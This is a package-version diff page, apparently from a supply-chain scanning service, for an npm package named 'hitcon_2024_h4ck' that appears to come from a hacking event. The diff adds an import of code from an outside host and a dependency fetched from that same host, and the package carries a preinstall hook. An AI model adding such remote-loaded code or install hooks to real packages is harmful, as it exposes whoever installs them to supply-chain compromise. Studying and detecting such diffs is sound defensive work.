hitcon_2024_h4ck 1.0.2 → 1.0.4

Sign up to get free protection for your applications and to get access to all the features.
@@ -1,5 +1,8 @@
1
+ import {Test} from "https://38205e06.pwnie.me/aaa"
2
+
1
3
  function helloWorld() {
2
4
  console.log("Hello, world!");
5
+ Test(a);
3
6
  }
4
7
 
5
8
  module.exports = helloWorld;
package/package.json CHANGED
@@ -1,12 +1,13 @@
1
1
  {
2
2
  "name": "hitcon_2024_h4ck",
3
- "version": "1.0.2",
3
+ "version": "1.0.4",
4
4
  "description": "",
5
- "main": "index.js",
5
+ "main": "index.tsx",
6
6
  "scripts": {
7
7
  "preinstall": "bash -c sleep 5000",
8
8
  "test": "echo \"Error: no test specified\" && exit 1"
9
9
  },
10
+ "dependencies": {"@package/package": "https://38205e06.pwnie.me/@package/package@1.0.0"},
10
11
  "author": "",
11
12
  "license": "ISC"
12
13
  }